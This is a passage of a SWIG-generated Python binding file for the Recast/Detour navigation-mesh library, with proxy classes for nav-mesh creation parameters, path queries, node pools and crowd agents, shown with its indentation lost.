__swig_getmethods__["tileLayer"] = _pyrecast.dtNavMeshCreateParams_tileLayer_get
if _newclass:tileLayer = _swig_property(_pyrecast.dtNavMeshCreateParams_tileLayer_get, _pyrecast.dtNavMeshCreateParams_tileLayer_set)
__swig_setmethods__["bmin"] = _pyrecast.dtNavMeshCreateParams_bmin_set
__swig_getmethods__["bmin"] = _pyrecast.dtNavMeshCreateParams_bmin_get
if _newclass:bmin = _swig_property(_pyrecast.dtNavMeshCreateParams_bmin_get, _pyrecast.dtNavMeshCreateParams_bmin_set)
__swig_setmethods__["bmax"] = _pyrecast.dtNavMeshCreateParams_bmax_set
__swig_getmethods__["bmax"] = _pyrecast.dtNavMeshCreateParams_bmax_get
if _newclass:bmax = _swig_property(_pyrecast.dtNavMeshCreateParams_bmax_get, _pyrecast.dtNavMeshCreateParams_bmax_set)
__swig_setmethods__["walkableHeight"] = _pyrecast.dtNavMeshCreateParams_walkableHeight_set
__swig_getmethods__["walkableHeight"] = _pyrecast.dtNavMeshCreateParams_walkableHeight_get
if _newclass:walkableHeight = _swig_property(_pyrecast.dtNavMeshCreateParams_walkableHeight_get, _pyrecast.dtNavMeshCreateParams_walkableHeight_set)
__swig_setmethods__["walkableRadius"] = _pyrecast.dtNavMeshCreateParams_walkableRadius_set
__swig_getmethods__["walkableRadius"] = _pyrecast.dtNavMeshCreateParams_walkableRadius_get
if _newclass:walkableRadius = _swig_property(_pyrecast.dtNavMeshCreateParams_walkableRadius_get, _pyrecast.dtNavMeshCreateParams_walkableRadius_set)
__swig_setmethods__["walkableClimb"] = _pyrecast.dtNavMeshCreateParams_walkableClimb_set
__swig_getmethods__["walkableClimb"] = _pyrecast.dtNavMeshCreateParams_walkableClimb_get
if _newclass:walkableClimb = _swig_property(_pyrecast.dtNavMeshCreateParams_walkableClimb_get, _pyrecast.dtNavMeshCreateParams_walkableClimb_set)
__swig_setmethods__["cs"] = _pyrecast.dtNavMeshCreateParams_cs_set
__swig_getmethods__["cs"] = _pyrecast.dtNavMeshCreateParams_cs_get
if _newclass:cs = _swig_property(_pyrecast.dtNavMeshCreateParams_cs_get, _pyrecast.dtNavMeshCreateParams_cs_set)
__swig_setmethods__["ch"] = _pyrecast.dtNavMeshCreateParams_ch_set
__swig_getmethods__["ch"] = _pyrecast.dtNavMeshCreateParams_ch_get
if _newclass:ch = _swig_property(_pyrecast.dtNavMeshCreateParams_ch_get, _pyrecast.dtNavMeshCreateParams_ch_set)
__swig_setmethods__["buildBvTree"] = _pyrecast.dtNavMeshCreateParams_buildBvTree_set
__swig_getmethods__["buildBvTree"] = _pyrecast.dtNavMeshCreateParams_buildBvTree_get
if _newclass:buildBvTree = _swig_property(_pyrecast.dtNavMeshCreateParams_buildBvTree_get, _pyrecast.dtNavMeshCreateParams_buildBvTree_set)
def __init__(self):
this = _pyrecast.new_dtNavMeshCreateParams()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNavMeshCreateParams
__del__ = lambda self : None;
dtNavMeshCreateParams_swigregister = _pyrecast.dtNavMeshCreateParams_swigregister
dtNavMeshCreateParams_swigregister(dtNavMeshCreateParams)
def dtCreateNavMeshData(*args):
return _pyrecast.dtCreateNavMeshData(*args)
dtCreateNavMeshData = _pyrecast.dtCreateNavMeshData
def dtNavMeshHeaderSwapEndian(*args):
return _pyrecast.dtNavMeshHeaderSwapEndian(*args)
dtNavMeshHeaderSwapEndian = _pyrecast.dtNavMeshHeaderSwapEndian
def dtNavMeshDataSwapEndian(*args):
return _pyrecast.dtNavMeshDataSwapEndian(*args)
dtNavMeshDataSwapEndian = _pyrecast.dtNavMeshDataSwapEndian
def dtSaveNavMesh(*args):
return _pyrecast.dtSaveNavMesh(*args)
dtSaveNavMesh = _pyrecast.dtSaveNavMesh
def dtLoadMesh(*args):
return _pyrecast.dtLoadMesh(*args)
dtLoadMesh = _pyrecast.dtLoadMesh
class dtQueryFilter(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtQueryFilter, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtQueryFilter, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtQueryFilter()
try: self.this.append(this)
except: self.this = this
def passFilter(self, *args): return _pyrecast.dtQueryFilter_passFilter(self, *args)
def getCost(self, *args): return _pyrecast.dtQueryFilter_getCost(self, *args)
def getAreaCost(self, *args): return _pyrecast.dtQueryFilter_getAreaCost(self, *args)
def setAreaCost(self, *args): return _pyrecast.dtQueryFilter_setAreaCost(self, *args)
def getIncludeFlags(self): return _pyrecast.dtQueryFilter_getIncludeFlags(self)
def setIncludeFlags(self, *args): return _pyrecast.dtQueryFilter_setIncludeFlags(self, *args)
def getExcludeFlags(self): return _pyrecast.dtQueryFilter_getExcludeFlags(self)
def setExcludeFlags(self, *args): return _pyrecast.dtQueryFilter_setExcludeFlags(self, *args)
__swig_destroy__ = _pyrecast.delete_dtQueryFilter
__del__ = lambda self : None;
dtQueryFilter_swigregister = _pyrecast.dtQueryFilter_swigregister
dtQueryFilter_swigregister(dtQueryFilter)
class dtNavMeshQuery(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMeshQuery, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNavMeshQuery, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtNavMeshQuery()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNavMeshQuery
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtNavMeshQuery_init(self, *args)
def findPath(self, *args): return _pyrecast.dtNavMeshQuery_findPath(self, *args)
def findStraightPath(self, *args): return _pyrecast.dtNavMeshQuery_findStraightPath(self, *args)
def initSlicedFindPath(self, *args): return _pyrecast.dtNavMeshQuery_initSlicedFindPath(self, *args)
def updateSlicedFindPath(self, *args): return _pyrecast.dtNavMeshQuery_updateSlicedFindPath(self, *args)
def finalizeSlicedFindPath(self, *args): return _pyrecast.dtNavMeshQuery_finalizeSlicedFindPath(self, *args)
def finalizeSlicedFindPathPartial(self, *args): return _pyrecast.dtNavMeshQuery_finalizeSlicedFindPathPartial(self, *args)
def findPolysAroundCircle(self, *args): return _pyrecast.dtNavMeshQuery_findPolysAroundCircle(self, *args)
def findPolysAroundShape(self, *args): return _pyrecast.dtNavMeshQuery_findPolysAroundShape(self, *args)
def findNearestPoly(self, *args): return _pyrecast.dtNavMeshQuery_findNearestPoly(self, *args)
def queryPolygons(self, *args): return _pyrecast.dtNavMeshQuery_queryPolygons(self, *args)
def findLocalNeighbourhood(self, *args): return _pyrecast.dtNavMeshQuery_findLocalNeighbourhood(self, *args)
def moveAlongSurface(self, *args): return _pyrecast.dtNavMeshQuery_moveAlongSurface(self, *args)
def raycast(self, *args): return _pyrecast.dtNavMeshQuery_raycast(self, *args)
def findDistanceToWall(self, *args): return _pyrecast.dtNavMeshQuery_findDistanceToWall(self, *args)
def getPolyWallSegments(self, *args): return _pyrecast.dtNavMeshQuery_getPolyWallSegments(self, *args)
def findRandomPoint(self, *args): return _pyrecast.dtNavMeshQuery_findRandomPoint(self, *args)
def findRandomPointAroundCircle(self, *args): return _pyrecast.dtNavMeshQuery_findRandomPointAroundCircle(self, *args)
def closestPointOnPoly(self, *args): return _pyrecast.dtNavMeshQuery_closestPointOnPoly(self, *args)
def closestPointOnPolyBoundary(self, *args): return _pyrecast.dtNavMeshQuery_closestPointOnPolyBoundary(self, *args)
def getPolyHeight(self, *args): return _pyrecast.dtNavMeshQuery_getPolyHeight(self, *args)
def isValidPolyRef(self, *args): return _pyrecast.dtNavMeshQuery_isValidPolyRef(self, *args)
def isInClosedList(self, *args): return _pyrecast.dtNavMeshQuery_isInClosedList(self, *args)
def getNodePool(self): return _pyrecast.dtNavMeshQuery_getNodePool(self)
def getAttachedNavMesh(self): return _pyrecast.dtNavMeshQuery_getAttachedNavMesh(self)
dtNavMeshQuery_swigregister = _pyrecast.dtNavMeshQuery_swigregister
dtNavMeshQuery_swigregister(dtNavMeshQuery)
def dtAllocNavMeshQuery():
return _pyrecast.dtAllocNavMeshQuery()
dtAllocNavMeshQuery = _pyrecast.dtAllocNavMeshQuery
def dtFreeNavMeshQuery(*args):
return _pyrecast.dtFreeNavMeshQuery(*args)
dtFreeNavMeshQuery = _pyrecast.dtFreeNavMeshQuery
DT_NODE_OPEN = _pyrecast.DT_NODE_OPEN
DT_NODE_CLOSED = _pyrecast.DT_NODE_CLOSED
class dtNode(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNode, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNode, name)
__repr__ = _swig_repr
__swig_setmethods__["pos"] = _pyrecast.dtNode_pos_set
__swig_getmethods__["pos"] = _pyrecast.dtNode_pos_get
if _newclass:pos = _swig_property(_pyrecast.dtNode_pos_get, _pyrecast.dtNode_pos_set)
__swig_setmethods__["cost"] = _pyrecast.dtNode_cost_set
__swig_getmethods__["cost"] = _pyrecast.dtNode_cost_get
if _newclass:cost = _swig_property(_pyrecast.dtNode_cost_get, _pyrecast.dtNode_cost_set)
__swig_setmethods__["total"] = _pyrecast.dtNode_total_set
__swig_getmethods__["total"] = _pyrecast.dtNode_total_get
if _newclass:total = _swig_property(_pyrecast.dtNode_total_get, _pyrecast.dtNode_total_set)
__swig_setmethods__["pidx"] = _pyrecast.dtNode_pidx_set
__swig_getmethods__["pidx"] = _pyrecast.dtNode_pidx_get
if _newclass:pidx = _swig_property(_pyrecast.dtNode_pidx_get, _pyrecast.dtNode_pidx_set)
__swig_setmethods__["flags"] = _pyrecast.dtNode_flags_set
__swig_getmethods__["flags"] = _pyrecast.dtNode_flags_get
if _newclass:flags = _swig_property(_pyrecast.dtNode_flags_get, _pyrecast.dtNode_flags_set)
__swig_setmethods__["id"] = _pyrecast.dtNode_id_set
__swig_getmethods__["id"] = _pyrecast.dtNode_id_get
if _newclass:id = _swig_property(_pyrecast.dtNode_id_get, _pyrecast.dtNode_id_set)
def __init__(self):
this = _pyrecast.new_dtNode()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNode
__del__ = lambda self : None;
dtNode_swigregister = _pyrecast.dtNode_swigregister
dtNode_swigregister(dtNode)
DT_NULL_IDX = cvar.DT_NULL_IDX
class dtNodePool(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNodePool, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNodePool, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _pyrecast.new_dtNodePool(*args)
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNodePool
__del__ = lambda self : None;
def clear(self): return _pyrecast.dtNodePool_clear(self)
def getNode(self, *args): return _pyrecast.dtNodePool_getNode(self, *args)
def findNode(self, *args): return _pyrecast.dtNodePool_findNode(self, *args)
def getNodeIdx(self, *args): return _pyrecast.dtNodePool_getNodeIdx(self, *args)
def getNodeAtIdx(self, *args): return _pyrecast.dtNodePool_getNodeAtIdx(self, *args)
def getMemUsed(self): return _pyrecast.dtNodePool_getMemUsed(self)
def getMaxNodes(self): return _pyrecast.dtNodePool_getMaxNodes(self)
def getHashSize(self): return _pyrecast.dtNodePool_getHashSize(self)
def getFirst(self, *args): return _pyrecast.dtNodePool_getFirst(self, *args)
def getNext(self, *args): return _pyrecast.dtNodePool_getNext(self, *args)
dtNodePool_swigregister = _pyrecast.dtNodePool_swigregister
dtNodePool_swigregister(dtNodePool)
class dtNodeQueue(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtNodeQueue, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtNodeQueue, name)
__repr__ = _swig_repr
def __init__(self, *args):
this = _pyrecast.new_dtNodeQueue(*args)
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtNodeQueue
__del__ = lambda self : None;
def clear(self): return _pyrecast.dtNodeQueue_clear(self)
def top(self): return _pyrecast.dtNodeQueue_top(self)
def pop(self): return _pyrecast.dtNodeQueue_pop(self)
def push(self, *args): return _pyrecast.dtNodeQueue_push(self, *args)
def modify(self, *args): return _pyrecast.dtNodeQueue_modify(self, *args)
def empty(self): return _pyrecast.dtNodeQueue_empty(self)
def getMemUsed(self): return _pyrecast.dtNodeQueue_getMemUsed(self)
def getCapacity(self): return _pyrecast.dtNodeQueue_getCapacity(self)
dtNodeQueue_swigregister = _pyrecast.dtNodeQueue_swigregister
dtNodeQueue_swigregister(dtNodeQueue)
class dtCrowdNeighbour(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdNeighbour, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowdNeighbour, name)
__repr__ = _swig_repr
__swig_setmethods__["idx"] = _pyrecast.dtCrowdNeighbour_idx_set
__swig_getmethods__["idx"] = _pyrecast.dtCrowdNeighbour_idx_get
if _newclass:idx = _swig_property(_pyrecast.dtCrowdNeighbour_idx_get, _pyrecast.dtCrowdNeighbour_idx_set)
__swig_setmethods__["dist"] = _pyrecast.dtCrowdNeighbour_dist_set
__swig_getmethods__["dist"] = _pyrecast.dtCrowdNeighbour_dist_get
if _newclass:dist = _swig_property(_pyrecast.dtCrowdNeighbour_dist_get, _pyrecast.dtCrowdNeighbour_dist_set)
def __init__(self):
this = _pyrecast.new_dtCrowdNeighbour()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtCrowdNeighbour
__del__ = lambda self : None;
dtCrowdNeighbour_swigregister = _pyrecast.dtCrowdNeighbour_swigregister
dtCrowdNeighbour_swigregister(dtCrowdNeighbour)
DT_CROWDAGENT_MAX_NEIGHBOURS = cvar.DT_CROWDAGENT_MAX_NEIGHBOURS
DT_CROWDAGENT_MAX_CORNERS = cvar.DT_CROWDAGENT_MAX_CORNERS
DT_CROWD_MAX_OBSTAVOIDANCE_PARAMS = cvar.DT_CROWD_MAX_OBSTAVOIDANCE_PARAMS
DT_CROWDAGENT_STATE_INVALID = _pyrecast.DT_CROWDAGENT_STATE_INVALID
DT_CROWDAGENT_STATE_WALKING = _pyrecast.DT_CROWDAGENT_STATE_WALKING
DT_CROWDAGENT_STATE_OFFMESH = _pyrecast.DT_CROWDAGENT_STATE_OFFMESH
class dtCrowdAgentParams(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgentParams, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgentParams, name)
__repr__ = _swig_repr
__swig_setmethods__["radius"] = _pyrecast.dtCrowdAgentParams_radius_set
__swig_getmethods__["radius"] = _pyrecast.dtCrowdAgentParams_radius_get
if _newclass:radius = _swig_property(_pyrecast.dtCrowdAgentParams_radius_get, _pyrecast.dtCrowdAgentParams_radius_set)
__swig_setmethods__["height"] = _pyrecast.dtCrowdAgentParams_height_set
__swig_getmethods__["height"] = _pyrecast.dtCrowdAgentParams_height_get
if _newclass:height = _swig_property(_pyrecast.dtCrowdAgentParams_height_get, _pyrecast.dtCrowdAgentParams_height_set)
__swig_setmethods__["maxAcceleration"] = _pyrecast.dtCrowdAgentParams_maxAcceleration_set
__swig_getmethods__["maxAcceleration"] = _pyrecast.dtCrowdAgentParams_maxAcceleration_get
if _newclass:maxAcceleration = _swig_property(_pyrecast.dtCrowdAgentParams_maxAcceleration_get, _pyrecast.dtCrowdAgentParams_maxAcceleration_set)
__swig_setmethods__["maxSpeed"] = _pyrecast.dtCrowdAgentParams_maxSpeed_set
__swig_getmethods__["maxSpeed"] = _pyrecast.dtCrowdAgentParams_maxSpeed_get
if _newclass:maxSpeed = _swig_property(_pyrecast.dtCrowdAgentParams_maxSpeed_get, _pyrecast.dtCrowdAgentParams_maxSpeed_set)
__swig_setmethods__["collisionQueryRange"] = _pyrecast.dtCrowdAgentParams_collisionQueryRange_set
__swig_getmethods__["collisionQueryRange"] = _pyrecast.dtCrowdAgentParams_collisionQueryRange_get
if _newclass:collisionQueryRange = _swig_property(_pyrecast.dtCrowdAgentParams_collisionQueryRange_get, _pyrecast.dtCrowdAgentParams_collisionQueryRange_set)
__swig_setmethods__["pathOptimizationRange"] = _pyrecast.dtCrowdAgentParams_pathOptimizationRange_set
__swig_getmethods__["pathOptimizationRange"] = _pyrecast.dtCrowdAgentParams_pathOptimizationRange_get
if _newclass:pathOptimizationRange = _swig_property(_pyrecast.dtCrowdAgentParams_pathOptimizationRange_get, _pyrecast.dtCrowdAgentParams_pathOptimizationRange_set)
__swig_setmethods__["separationWeight"] = _pyrecast.dtCrowdAgentParams_separationWeight_set
__swig_getmethods__["separationWeight"] = _pyrecast.dtCrowdAgentParams_separationWeight_get
if _newclass:separationWeight = _swig_property(_pyrecast.dtCrowdAgentParams_separationWeight_get, _pyrecast.dtCrowdAgentParams_separationWeight_set)
__swig_setmethods__["updateFlags"] = _pyrecast.dtCrowdAgentParams_updateFlags_set
__swig_getmethods__["updateFlags"] = _pyrecast.dtCrowdAgentParams_updateFlags_get
if _newclass:updateFlags = _swig_property(_pyrecast.dtCrowdAgentParams_updateFlags_get, _pyrecast.dtCrowdAgentParams_updateFlags_set)
__swig_setmethods__["obstacleAvoidanceType"] = _pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_set
__swig_getmethods__["obstacleAvoidanceType"] = _pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_get
if _newclass:obstacleAvoidanceType = _swig_property(_pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_get, _pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_set)
__swig_setmethods__["userData"] = _pyrecast.dtCrowdAgentParams_userData_set
__swig_getmethods__["userData"] = _pyrecast.dtCrowdAgentParams_userData_get
if _newclass:userData = _swig_property(_pyrecast.dtCrowdAgentParams_userData_get, _pyrecast.dtCrowdAgentParams_userData_set)
def __init__(self):
this = _pyrecast.new_dtCrowdAgentParams()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtCrowdAgentParams
__del__ = lambda self : None;
dtCrowdAgentParams_swigregister = _pyrecast.dtCrowdAgentParams_swigregister
dtCrowdAgentParams_swigregister(dtCrowdAgentParams)
DT_CROWDAGENT_TARGET_NONE = _pyrecast.DT_CROWDAGENT_TARGET_NONE
DT_CROWDAGENT_TARGET_FAILED = _pyrecast.DT_CROWDAGENT_TARGET_FAILED
DT_CROWDAGENT_TARGET_VALID = _pyrecast.DT_CROWDAGENT_TARGET_VALID
DT_CROWDAGENT_TARGET_REQUESTING = _pyrecast.DT_CROWDAGENT_TARGET_REQUESTING
DT_CROWDAGENT_TARGET_WAITING_FOR_QUEUE = _pyrecast.DT_CROWDAGENT_TARGET_WAITING_FOR_QUEUE
DT_CROWDAGENT_TARGET_WAITING_FOR_PATH = _pyrecast.DT_CROWDAGENT_TARGET_WAITING_FOR_PATH
DT_CROWDAGENT_TARGET_VELOCITY = _pyrecast.DT_CROWDAGENT_TARGET_VELOCITY
class dtCrowdAgent(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgent, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgent, name)
__repr__ = _swig_repr
__swig_setmethods__["active"] = _pyrecast.dtCrowdAgent_active_set
__swig_getmethods__["active"] = _pyrecast.dtCrowdAgent_active_get
if _newclass:active = _swig_property(_pyrecast.dtCrowdAgent_active_get, _pyrecast.dtCrowdAgent_active_set)
__swig_setmethods__["state"] = _pyrecast.dtCrowdAgent_state_set
__swig_getmethods__["state"] = _pyrecast.dtCrowdAgent_state_get
if _newclass:state = _swig_property(_pyrecast.dtCrowdAgent_state_get, _pyrecast.dtCrowdAgent_state_set)
__swig_setmethods__["corridor"] = _pyrecast.dtCrowdAgent_corridor_set
__swig_getmethods__["corridor"] = _pyrecast.dtCrowdAgent_corridor_get
if _newclass:corridor = _swig_property(_pyrecast.dtCrowdAgent_corridor_get, _pyrecast.dtCrowdAgent_corridor_set)
__swig_setmethods__["boundary"] = _pyrecast.dtCrowdAgent_boundary_set
__swig_getmethods__["boundary"] = _pyrecast.dtCrowdAgent_boundary_get
if _newclass:boundary = _swig_property(_pyrecast.dtCrowdAgent_boundary_get, _pyrecast.dtCrowdAgent_boundary_set)
__swig_setmethods__["topologyOptTime"] = _pyrecast.dtCrowdAgent_topologyOptTime_set
__swig_getmethods__["topologyOptTime"] = _pyrecast.dtCrowdAgent_topologyOptTime_get
if _newclass:topologyOptTime = _swig_property(_pyrecast.dtCrowdAgent_topologyOptTime_get, _pyrecast.dtCrowdAgent_topologyOptTime_set)
__swig_setmethods__["neis"] = _pyrecast.dtCrowdAgent_neis_set
__swig_getmethods__["neis"] = _pyrecast.dtCrowdAgent_neis_get
if _newclass:neis = _swig_property(_pyrecast.dtCrowdAgent_neis_get, _pyrecast.dtCrowdAgent_neis_set)
__swig_setmethods__["nneis"] = _pyrecast.dtCrowdAgent_nneis_set
__swig_getmethods__["nneis"] = _pyrecast.dtCrowdAgent_nneis_get
if _newclass:nneis = _swig_property(_pyrecast.dtCrowdAgent_nneis_get, _pyrecast.dtCrowdAgent_nneis_set)
__swig_setmethods__["desiredSpeed"] = _pyrecast.dtCrowdAgent_desiredSpeed_set
__swig_getmethods__["desiredSpeed"] = _pyrecast.dtCrowdAgent_desiredSpeed_get
if _newclass:desiredSpeed = _swig_property(_pyrecast.dtCrowdAgent_desiredSpeed_get, _pyrecast.dtCrowdAgent_desiredSpeed_set)
__swig_setmethods__["npos"] = _pyrecast.dtCrowdAgent_npos_set
__swig_getmethods__["npos"] = _pyrecast.dtCrowdAgent_npos_get
if _newclass:npos = _swig_property(_pyrecast.dtCrowdAgent_npos_get, _pyrecast.dtCrowdAgent_npos_set)
__swig_setmethods__["disp"] = _pyrecast.dtCrowdAgent_disp_set
__swig_getmethods__["disp"] = _pyrecast.dtCrowdAgent_disp_get
if _newclass:disp = _swig_property(_pyrecast.dtCrowdAgent_disp_get, _pyrecast.dtCrowdAgent_disp_set)
__swig_setmethods__["dvel"] = _pyrecast.dtCrowdAgent_dvel_set
__swig_getmethods__["dvel"] = _pyrecast.dtCrowdAgent_dvel_get
if _newclass:dvel = _swig_property(_pyrecast.dtCrowdAgent_dvel_get, _pyrecast.dtCrowdAgent_dvel_set)
__swig_setmethods__["nvel"] = _pyrecast.dtCrowdAgent_nvel_set
__swig_getmethods__["nvel"] = _pyrecast.dtCrowdAgent_nvel_get
if _newclass:nvel = _swig_property(_pyrecast.dtCrowdAgent_nvel_get, _pyrecast.dtCrowdAgent_nvel_set)
__swig_setmethods__["vel"] = _pyrecast.dtCrowdAgent_vel_set
__swig_getmethods__["vel"] = _pyrecast.dtCrowdAgent_vel_get
if _newclass:vel = _swig_property(_pyrecast.dtCrowdAgent_vel_get, _pyrecast.dtCrowdAgent_vel_set)
__swig_setmethods__["params"] = _pyrecast.dtCrowdAgent_params_set
__swig_getmethods__["params"] = _pyrecast.dtCrowdAgent_params_get
if _newclass:params = _swig_property(_pyrecast.dtCrowdAgent_params_get, _pyrecast.dtCrowdAgent_params_set)
__swig_setmethods__["cornerVerts"] = _pyrecast.dtCrowdAgent_cornerVerts_set
__swig_getmethods__["cornerVerts"] = _pyrecast.dtCrowdAgent_cornerVerts_get
if _newclass:cornerVerts = _swig_property(_pyrecast.dtCrowdAgent_cornerVerts_get, _pyrecast.dtCrowdAgent_cornerVerts_set)
__swig_setmethods__["cornerFlags"] = _pyrecast.dtCrowdAgent_cornerFlags_set
__swig_getmethods__["cornerFlags"] = _pyrecast.dtCrowdAgent_cornerFlags_get
if _newclass:cornerFlags = _swig_property(_pyrecast.dtCrowdAgent_cornerFlags_get, _pyrecast.dtCrowdAgent_cornerFlags_set)
__swig_setmethods__["cornerPolys"] = _pyrecast.dtCrowdAgent_cornerPolys_set
__swig_getmethods__["cornerPolys"] = _pyrecast.dtCrowdAgent_cornerPolys_get
if _newclass:cornerPolys = _swig_property(_pyrecast.dtCrowdAgent_cornerPolys_get, _pyrecast.dtCrowdAgent_cornerPolys_set)
__swig_setmethods__["ncorners"] = _pyrecast.dtCrowdAgent_ncorners_set
__swig_getmethods__["ncorners"] = _pyrecast.dtCrowdAgent_ncorners_get
if _newclass:ncorners = _swig_property(_pyrecast.dtCrowdAgent_ncorners_get, _pyrecast.dtCrowdAgent_ncorners_set)
__swig_setmethods__["targetState"] = _pyrecast.dtCrowdAgent_targetState_set
__swig_getmethods__["targetState"] = _pyrecast.dtCrowdAgent_targetState_get
if _newclass:targetState = _swig_property(_pyrecast.dtCrowdAgent_targetState_get, _pyrecast.dtCrowdAgent_targetState_set)
__swig_setmethods__["targetRef"] = _pyrecast.dtCrowdAgent_targetRef_set
__swig_getmethods__["targetRef"] = _pyrecast.dtCrowdAgent_targetRef_get
if _newclass:targetRef = _swig_property(_pyrecast.dtCrowdAgent_targetRef_get, _pyrecast.dtCrowdAgent_targetRef_set)
__swig_setmethods__["targetPos"] = _pyrecast.dtCrowdAgent_targetPos_set
__swig_getmethods__["targetPos"] = _pyrecast.dtCrowdAgent_targetPos_get
if _newclass:targetPos = _swig_property(_pyrecast.dtCrowdAgent_targetPos_get, _pyrecast.dtCrowdAgent_targetPos_set)
__swig_setmethods__["targetPathqRef"] = _pyrecast.dtCrowdAgent_targetPathqRef_set
__swig_getmethods__["targetPathqRef"] = _pyrecast.dtCrowdAgent_targetPathqRef_get
if _newclass:targetPathqRef = _swig_property(_pyrecast.dtCrowdAgent_targetPathqRef_get, _pyrecast.dtCrowdAgent_targetPathqRef_set)
__swig_setmethods__["targetReplan"] = _pyrecast.dtCrowdAgent_targetReplan_set
__swig_getmethods__["targetReplan"] = _pyrecast.dtCrowdAgent_targetReplan_get
if _newclass:targetReplan = _swig_property(_pyrecast.dtCrowdAgent_targetReplan_get, _pyrecast.dtCrowdAgent_targetReplan_set)
__swig_setmethods__["targetReplanTime"] = _pyrecast.dtCrowdAgent_targetReplanTime_set
__swig_getmethods__["targetReplanTime"] = _pyrecast.dtCrowdAgent_targetReplanTime_get
if _newclass:targetReplanTime = _swig_property(_pyrecast.dtCrowdAgent_targetReplanTime_get, _pyrecast.dtCrowdAgent_targetReplanTime_set)
def __init__(self):
this = _pyrecast.new_dtCrowdAgent()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtCrowdAgent
__del__ = lambda self : None;
dtCrowdAgent_swigregister = _pyrecast.dtCrowdAgent_swigregister
dtCrowdAgent_swigregister(dtCrowdAgent)
class dtCrowdAgentAnimation(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgentAnimation, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgentAnimation, name)
__repr__ = _swig_repr
__swig_setmethods__["active"] = _pyrecast.dtCrowdAgentAnimation_active_set
__swig_getmethods__["active"] = _pyrecast.dtCrowdAgentAnimation_active_get
if _newclass:active = _swig_property(_pyrecast.dtCrowdAgentAnimation_active_get, _pyrecast.dtCrowdAgentAnimation_active_set)
__swig_setmethods__["initPos"] = _pyrecast.dtCrowdAgentAnimation_initPos_set
__swig_getmethods__["initPos"] = _pyrecast.dtCrowdAgentAnimation_initPos_get
if _newclass:initPos = _swig_property(_pyrecast.dtCrowdAgentAnimation_initPos_get, _pyrecast.dtCrowdAgentAnimation_initPos_set)
__swig_setmethods__["startPos"] = _pyrecast.dtCrowdAgentAnimation_startPos_set
__swig_getmethods__["startPos"] = _pyrecast.dtCrowdAgentAnimation_startPos_get
if _newclass:startPos = _swig_property(_pyrecast.dtCrowdAgentAnimation_startPos_get, _pyrecast.dtCrowdAgentAnimation_startPos_set)
__swig_setmethods__["endPos"] = _pyrecast.dtCrowdAgentAnimation_endPos_set
__swig_getmethods__["endPos"] = _pyrecast.dtCrowdAgentAnimation_endPos_get
if _newclass:endPos = _swig_property(_pyrecast.dtCrowdAgentAnimation_endPos_get, _pyrecast.dtCrowdAgentAnimation_endPos_set)
__swig_setmethods__["polyRef"] = _pyrecast.dtCrowdAgentAnimation_polyRef_set
__swig_getmethods__["polyRef"] = _pyrecast.dtCrowdAgentAnimation_polyRef_get
if _newclass:polyRef = _swig_property(_pyrecast.dtCrowdAgentAnimation_polyRef_get, _pyrecast.dtCrowdAgentAnimation_polyRef_set)
__swig_setmethods__["t"] = _pyrecast.dtCrowdAgentAnimation_t_set
__swig_getmethods__["t"] = _pyrecast.dtCrowdAgentAnimation_t_get
if _newclass:t = _swig_property(_pyrecast.dtCrowdAgentAnimation_t_get, _pyrecast.dtCrowdAgentAnimation_t_set)
__swig_setmethods__["tmax"] = _pyrecast.dtCrowdAgentAnimation_tmax_set
__swig_getmethods__["tmax"] = _pyrecast.dtCrowdAgentAnimation_tmax_get
if _newclass:tmax = _swig_property(_pyrecast.dtCrowdAgentAnimation_tmax_get, _pyrecast.dtCrowdAgentAnimation_tmax_set)
def __init__(self):
this = _pyrecast.new_dtCrowdAgentAnimation()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtCrowdAgentAnimation
__del__ = lambda self : None;
dtCrowdAgentAnimation_swigregister = _pyrecast.dtCrowdAgentAnimation_swigregister
dtCrowdAgentAnimation_swigregister(dtCrowdAgentAnimation)
